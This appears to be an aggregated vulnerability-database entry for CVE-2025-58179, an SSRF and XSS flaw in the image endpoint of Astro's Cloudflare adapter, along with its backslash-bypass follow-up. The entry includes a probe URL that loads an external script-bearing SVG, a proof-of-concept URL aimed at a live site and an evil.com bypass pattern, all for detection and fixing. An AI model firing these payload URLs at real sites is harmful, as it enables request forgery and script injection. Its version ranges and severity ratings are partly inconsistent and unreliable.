CVE-2025-58179
Published 2025-09-05
Priority P279 · medium 6.5 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Exploited in the wild (VulnCheck KEV)
EPSS: 0.77% (51.1th percentile)
Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare's infrastructure allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin. This issue is fixed in version 12.6.6.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| astro | astro | >= 5.13.4 < 5.13.10 | 5.13.10 |
| astro | astro | >= 5.13.4 < 5.13.10 | 5.13.10 |
| astro | astrojs_cloudflare | >= 11.0.3 < 12.6.6 | 12.6.6 |
| astrojs | cloudflare | >= 11.0.3 < 12.6.6 | 12.6.6 |
| withastro | astrojs_cloudflare | < 13.1.10 | 13.1.10 |
Detection & IOCs (extracted from sources)
Probe URL: `{{BaseURL}}/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg`
- Probe the /_image endpoint with an external href parameter pointing to an SVG containing JavaScript. A vulnerable instance will fetch and return the SVG with Content-Type: image/svg+xml and body containing '<script type="text/javascript' and 'alert(document.domain);'.
- Match HTTP 200 response with Content-Type 'image/svg+xml' AND body containing both '<script type="text/javascript' and 'alert(document.domain);' to confirm successful SSRF/XSS via the image optimization endpoint.
- Vulnerability is triggered when the Astro Cloudflare adapter is configured with output: 'server' and the default imageService: 'compile'. The /_image endpoint accepts arbitrary external URLs via the 'href' query parameter without domain validation.
- CVE-2025-59837 is a related bypass of the same image proxy domain validation using backslashes in the href parameter; detections for CVE-2025-58179 should also consider backslash-based bypass variants (e.g., /_image?href=https:\\evil.com/...).
- Vulnerability only affects @astrojs/cloudflare adapter versions 11.0.3 through 12.6.5; the fix is present in version 12.6.6 and later.
- Exploitation requires the Astro application to be deployed with both output: 'server' and the default imageService: 'compile' configuration; other configurations are not affected.
- CVE-2025-58179's fix was incomplete; CVE-2025-59837 (fixed in Astro 5.13.10) describes a bypass of the same domain validation using backslashes in the href parameter.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 6.5 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N |
| ghsa | | 6.5 | MEDIUM | |
| osv | | 6.5 | MEDIUM | |
| vulncheck | | 6.5 | MEDIUM | |
OSV
CVE-2025-59837 [MEDIUM] Astro's bypass of image proxy domain validation leads to SSRF and potential XSS
osv · 2025-10-28 · CVSS 6.5
### Summary
This is a patch bypass of CVE-2025-58179 in commit [9ecf359](https://github.com/withastro/astro/commit/9ecf3598e2b29dd74614328fde3047ea90e67252). The fix blocks `http://`, `https://` and `//`, but can be bypassed using backslashes (`\`) - the endpoint still issues a server-side fetch.
### PoC
[https://astro.build/_image?href=\\raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg](https://astro.build/_image?href=%5C%5Craw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg)
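The bypass above comes down to checking the raw href string instead of the host a fetch would actually contact. The following is an added example, not Astro's code: a simplified model of the first fix's prefix check beside a hardened check that resolves the href the way the WHATWG URL parser (and fetch) does, then enforces the site origin or a domain allowlist like the `image.domains` setting. `SITE_ORIGIN`, `ALLOWED_DOMAINS` and the sample hrefs are assumed, constructed values.

```javascript
// Added example (not Astro's code). SITE_ORIGIN and ALLOWED_DOMAINS are
// assumed values standing in for the deployed site and its image.domains list.
const SITE_ORIGIN = 'https://site.example';
const ALLOWED_DOMAINS = new Set(['cdn.example']);

// Weak model of the first fix: treat an href as local unless its raw string
// starts with http://, https:// or //. A backslash form slips through.
function weakCheckTreatsAsLocal(href) {
  const s = href.toLowerCase();
  return !(s.startsWith('http://') || s.startsWith('https://') || s.startsWith('//'));
}

// Host a fetch would resolve the href to. The WHATWG URL parser normalises
// '\' to '/' for http(s), so '\\evil.example/x' resolves to host evil.example.
function resolvedHost(href) {
  try {
    return new URL(href, SITE_ORIGIN).hostname;
  } catch {
    return null; // unparsable href
  }
}

// Hardened check: decide on the resolved URL, never on the raw string. Allow
// only http(s) targets on the site itself or on an explicitly authorised domain.
function hardenedCheckAllows(href) {
  let url;
  try {
    url = new URL(href, SITE_ORIGIN);
  } catch {
    return false;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return false;
  if (url.origin === SITE_ORIGIN) return true; // local image bundled with the site
  return ALLOWED_DOMAINS.has(url.hostname);     // authorised remote domain
}

// Constructed sample hrefs, including the backslash forms from the bypass report.
const SAMPLES = [
  '/_astro/logo.png',             // local image: both checks pass
  'https://cdn.example/a.png',    // authorised remote domain: hardened check passes
  'https://evil.example/a.svg',   // plain remote: both checks block
  '\\\\evil.example/a.svg',       // backslash form: weak check passes, hardened blocks
  'https:\\\\evil.example/a.svg', // scheme plus backslashes: same outcome
];

// Returns, per sample href, the resolved host and both checks' verdicts.
function compare() {
  const out = {};
  for (const href of SAMPLES) {
    out[href] = { host: resolvedHost(href), weakLocal: weakCheckTreatsAsLocal(href),
                  hardened: hardenedCheckAllows(href) };
  }
  return out;
}
```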
GHSA
CVE-2025-59837 [MEDIUM] CWE-79 Astro's bypass of image proxy domain validation leads to SSRF and potential XSS
ghsa · 2025-10-28 · CVSS 6.5
OSV
CVE-2025-58179 [HIGH] Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter
osv · 2025-09-04
### Summary
When using Astro's Cloudflare adapter (`@astrojs/cloudflare`) configured with `output: 'server'` while using the default `imageService: 'compile'`, the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served.
### Details
On-demand rendered sites built with Astro include an `/_image` endpoint, which returns optimized versions of images.
The `/_image` endpoint is restricted to processing local images bundled with the site and also supports remote images from domains the site developer has manually authorized (using the [`image.domains`](https://docs.astro.build/en/reference/configuration-reference/#imagedomains) or
GHSA
CVE-2025-58179 [HIGH] CWE-918 Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter
ghsa · 2025-09-04
VulnCheck
CVE-2025-58179 [MEDIUM] astro @astrojs/cloudflare Server-Side Request Forgery (SSRF)
vulncheck · 2025 · CVSS 6.5
Affected: astro @astrojs/cloudflare
Required Action: Apply remediations or mitigations
No detection rules found.
Nuclei
CVE-2025-58179 [MEDIUM] Astro Cloudflare Adapter - Server Side Request Forgery
nuclei · CVSS 6.5
Template (truncated as indexed):

```yaml
id: CVE-2025-58179
info:
  name: Astro Cloudflare Adapter - Server Side Request Forgery
  author: HoangAnhThai
  severity: high
  de
```
No writeups or analysis indexed.